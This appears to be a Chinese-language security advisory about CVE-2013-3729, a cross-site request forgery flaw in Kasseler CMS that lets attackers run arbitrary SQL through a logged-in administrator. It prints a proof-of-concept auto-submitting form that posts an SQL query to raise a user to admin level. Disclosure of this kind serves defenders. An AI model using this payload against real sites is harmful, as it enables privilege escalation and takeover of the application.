Kasseler CMS跨站请求伪造漏洞

发布日期:2013-07-03
更新日期:2013-07-05

受影响系统:
Kasseler CMS Kasseler CMS <= 2 r1223
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60929
CVE(CAN) ID: CVE-2013-3729

Kasseler CMS是内容管理系统。

Kasseler CMS 存在跨站请求伪造漏洞,此漏洞源于整个应用中缺少CSRF保护机制。远程攻击者可诱使已经登录的管理员浏览特制的网页,这些网页带有CSRF利用代码,利用此漏洞在应用的数据库中执行任意SQL查询并完全控制应用。

<*来源:High-Tech Bridge Security Research Lab
 
  链接:https://www.htbridge.com/advisory/HTB23158
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<form action="http://[host]/admin.php?module=database&do=sql_query " method="post">
<input type="hidden"  value="UPDATE `kasseler`.`kasseler_users` SET `user_level` = '2', `user_group` =
'1' WHERE `kasseler_users`.`uid` =2 LIMIT 1 ;">
<input type="submit">
</form>
<script>
document.main.submit();
</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Kasseler CMS
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxjwz.html